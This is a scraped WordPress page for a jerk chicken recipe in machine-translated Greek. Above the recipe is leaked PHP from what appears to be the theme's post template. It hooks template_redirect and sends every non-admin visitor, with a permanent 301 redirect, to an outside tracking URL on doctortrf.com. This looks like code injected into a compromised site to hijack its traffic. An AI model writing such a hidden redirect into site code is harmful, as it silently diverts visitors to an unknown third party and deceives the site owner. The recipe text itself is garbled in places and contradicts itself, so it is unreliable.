function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Template part for displaying single post content in single.php * * @package Asona/Templates * @since 1.0 * @author apalodi */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly ?>

Ταραγμένος κοτόπουλο

Ταραγμένος κοτόπουλο
Ταραγμένος κοτόπουλο

Ταραγμένος κοτόπουλο Ένα νόστιμο πιάτο για κάθε περίσταση

Συστατικά:

  • Ολόκληρο κοτόπουλο, χωρισμένο σε έξι ίσα μέρη
  • Για την άλμη: τζίντζερ, μούρα μπαχάρι, αλάτι, ζάχαρη, τσίλι σκωτσέζικου καπό
  • Για την πάστα jerk: σάλτσα σόγιας, σάλτσα Worcestershire, θυμάρι, αλάτι, κανέλα, γαρύφαλλο, πάστα ταμαρίνδου, φρέσκο δάφνη, καστανή ζάχαρη, πιπεριές σκωτσέζικους, σκόρδο, φρέσκα κρεμμυδάκια, τζίντζερ
  • Για τη σάλτσα μπάρμπεκιου:
  • Κρεμμύδια
  • Φυτικό λάδι
  • Σκόρδο
  • Τζίντζερ
  • Πάστα Jerk (παρασκευάστηκε νωρίτερα)
  • Καστανή ζάχαρη
  • Κέτσαπ

Οδηγίες:

  1. Ετοιμάστε την άλμη: Σε μια κατσαρόλα, ανακατέψτε το νερό, το τζίντζερ, τα μούρα μπαχάρι, το αλάτι, τη ζάχαρη και το σκωτσέζικο τσίλι. Σε μια κατσαρόλα βάζουμε τη ζάχαρη και το αλάτι και τα αφήνουμε να βράσουν. Ψύξτε το τηγάνι αφού το αποσύρετε από τη φωτιά. Αφαιρέστε το μισό υγρό για πάγο για να επιταχύνετε τη διαδικασία ψύξης. Τοποθετήστε το κοτόπουλο στην άλμη και αφήστε το να καθίσει για τουλάχιστον 24 ώρες, κατά προτίμηση 48 ώρες.
  2. Ετοιμάστε την πάστα jerk: Σε έναν επεξεργαστή τροφίμων, ανακατέψτε τη σάλτσα σόγιας, τη σάλτσα Worcestershire, το θυμάρι, το αλάτι, την κανέλα, το γαρύφαλλο, την πάστα tamarind, τη φρέσκια δάφνη, την καστανή ζάχαρη, τις πιπεριές, το σκόρδο, τα φρέσκα κρεμμύδια και το τζίντζερ. Επεξεργάζεστε μέχρι να σχηματιστεί μια χοντρή πάστα.
  3. Ετοιμάστε τη σάλτσα μπάρμπεκιου jerk: Σε μια κατσαρόλα, ιδρώστε τα κρεμμύδια σε φυτικό λάδι σε μέτρια φωτιά. Προσθέστε το σκόρδο, το τζίντζερ και μια πρέζα αλάτι. Μετά από λίγα λεπτά, προσθέστε την πάστα jerk, την καστανή ζάχαρη και το κέτσαπ. Ανακατεύουμε καλά και αφήνουμε να σιγοβράσει για περίπου 30 λεπτά. Ανακατεύουμε τη σάλτσα μέχρι να ομογενοποιηθεί.
  4. Ψήστε το κοτόπουλο: Προθερμάνετε τη σχάρα και μουλιάστε τα ροκανίδια σε νερό. Τοποθετήστε τα ροκανίδια απευθείας στα κάρβουνα για να δημιουργήσετε καπνό. Αλατοπιπερώνουμε το κοτόπουλο και το ψήνουμε στη σχάρα σε μέτρια φωτιά, αναποδογυρίζοντας το κατά διαστήματα μέχρι να αποκτήσει καραμελωμένο χρώμα και τραγανή φλούδα.
  5. Εφαρμόστε πάστα jerk και σάλτσα μπάρμπεκιου: Αλείψτε το κοτόπουλο με την πάστα jerk κατά τη διάρκεια του ψησίματος. Προς το τέλος του μαγειρέματος, αλείφουμε το κοτόπουλο με τη σάλτσα μπάρμπεκιου και το αφήνουμε να καραμελώσει.
  6. Σερβίρουμε: Βγάζουμε το κοτόπουλο από τη σχάρα και το αφήνουμε να ξεκουραστεί. Κόψτε το κοτόπουλο σε κομμάτια και σερβίρετε με πρόσθετη πάστα και σάλτσα μπάρμπεκιου. Απολαμβάνω!
Ταραγμένος κοτόπουλο
Ταραγμένος κοτόπουλο

Leave a Reply

Your email address will not be published. Required fields are marked *